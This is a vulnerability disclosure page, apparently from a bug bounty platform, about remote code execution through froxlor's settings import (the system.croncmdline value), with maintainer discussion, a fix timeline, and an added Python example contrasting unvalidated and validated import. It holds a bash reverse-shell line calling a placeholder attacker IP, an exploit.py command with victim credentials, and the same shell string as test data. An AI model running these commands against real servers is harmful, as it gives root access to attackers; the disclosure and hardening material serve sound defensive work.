Remote Code Execution in "Import Settings" feature in froxlor/froxlor

Valid

Reported on

Feb 4th 2023


Description

Due to improper data validation in the "Import Settings" feature, an authenticated attacker can import crafted settings that carry a malicious payload in the "system.croncmdline" value.

Steps to reproduce

Requirement: PHP code must be executed on the attacker machine

  • Step 1: The attacker runs a web server that serves a file foo.txt. The content of this file is a reverse shell back to the attacker's machine, for example:
#!/bin/bash
bash -i >& /dev/tcp/{ATTACKER-IP}/{ATTACKER-PORT} 0>&1
  • Step 2: Run exploit.py with the parameters it requires:
python3 exploit.py -t {VICTIM-WEBSERVER} -u {USERNAME} -p {PASSWORD} -s {ATTACKER-WEBSERVER} -lport {ATTACKER-LISTENING-PORT}

Proof of Concept

Impact

This vulnerability can be exploited to achieve remote code execution on the target web server as the highest-privileged user (root).

We are processing your report and will contact the froxlor team within 24 hours. 2 months ago
We have contacted a member of the froxlor team and are waiting to hear back 2 months ago
Michael
2 months ago

Maintainer


Setting reload commands for the cronjob is part of froxlor. You could also just specify a script that runs rm -rf / if you want. Also, the required permissions for these actions are high.

Michael Kaufmann modified the Severity from Critical (9.9) to Critical (9.1) 2 months ago
froxlor/froxlor maintainer
2 months ago

Hi Michael, thank you for your feedback. However, in this line of code the croncmdline parameter is validated using a regex (it only accepts /^[a-z0-9/._- ]+$/i). But when using the import settings feature there is no validation or filter at all, so I think it is a critical bug: if any admin is compromised, the attacker can then totally compromise the system (because the cron job runs with root privileges).
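The validation gap the thread describes, as an added illustration that is not froxlor's code: a form path that applies the allowlist quoted above to system.croncmdline, an import path that stores values without any check, and a hardened import that runs every key through the same validator before writing anything. The validator table, the helper names and both sample values (a plausible cron command line and the step 1 reverse shell placed directly in the setting) are constructed for this example; the hyphen in the character class is taken literally, on the assumption that the page's rendering dropped an escape. Note that the allowlist rejects the shell metacharacters in the payload but, as the maintainer points out, still lets an administrator point the cron command at any script path.

```python
import json
import re

# Allowlist the normal settings form applies to system.croncmdline: the
# character class quoted in the thread, /^[a-z0-9/._- ]+$/i, with the
# hyphen taken literally (assumption: the page's rendering dropped an escape).
CRONCMD_RE = re.compile(r"[a-z0-9/._\- ]+", re.IGNORECASE)

# Hypothetical validator table. Only keys listed here carry a constraint.
VALIDATORS = {
    "system.croncmdline": lambda v: isinstance(v, str) and CRONCMD_RE.fullmatch(v) is not None,
}


def is_valid(key, value):
    """True when the value passes the validator registered for key (or there is none)."""
    check = VALIDATORS.get(key)
    return check is None or check(value)


def update_setting(settings, key, value):
    """Form path: a single key, validated before it is stored."""
    if not is_valid(key, value):
        raise ValueError(f"invalid value for {key}")
    settings[key] = value


def import_settings_vulnerable(settings, blob):
    """Import path as the report describes it: every value stored unvalidated."""
    settings.update(json.loads(blob))


def import_settings_hardened(settings, blob):
    """Import path with the same per-key check as the form.

    All keys are validated before any is written, so a rejected import
    leaves the stored settings untouched rather than half-applied.
    """
    imported = json.loads(blob)
    bad = [k for k, v in imported.items() if not is_valid(k, v)]
    if bad:
        raise ValueError(f"rejected import, invalid values for: {', '.join(bad)}")
    settings.update(imported)


# Constructed inputs. LEGIT is a plausible cron command line; PAYLOAD is the
# reverse shell from step 1 of the report placed directly in the setting.
LEGIT = "/usr/bin/nice -n 5 /usr/bin/php -q"
PAYLOAD = "bash -i >& /dev/tcp/203.0.113.5/4444 0>&1"


def demo():
    """Push the payload through each path and report what ended up stored."""
    results = {}
    stored = {"system.croncmdline": LEGIT}

    # Form path: the shell metacharacters (>, &, :) fail the allowlist.
    try:
        update_setting(stored, "system.croncmdline", PAYLOAD)
        results["form"] = "accepted"
    except ValueError:
        results["form"] = "rejected"

    # Vulnerable import: the same payload is stored without any check.
    blob = json.dumps({"system.croncmdline": PAYLOAD})
    import_settings_vulnerable(stored, blob)
    results["import_vulnerable"] = stored["system.croncmdline"]

    # Hardened import: rejected, and the previous value is left in place.
    stored = {"system.croncmdline": LEGIT}
    try:
        import_settings_hardened(stored, blob)
        results["import_hardened"] = "accepted"
    except ValueError:
        results["import_hardened"] = "rejected"
    results["after_hardened"] = stored["system.croncmdline"]
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name}: {outcome}")
```

The design point is that validation belongs to the setting, not to the form that usually writes it: any second write path (import, API, CLI) must reuse the same validator, and a bulk import should validate the whole set before committing any of it.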

froxlor/froxlor maintainer has acknowledged this report 2 months ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Michael Kaufmann validated this vulnerability 2 months ago
blakduk has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Michael Kaufmann marked this as fixed in 2.0.11 with commit aa48ff 2 months ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
This vulnerability is scheduled to go public on Feb 17th 2023
Michael Kaufmann published this vulnerability a month ago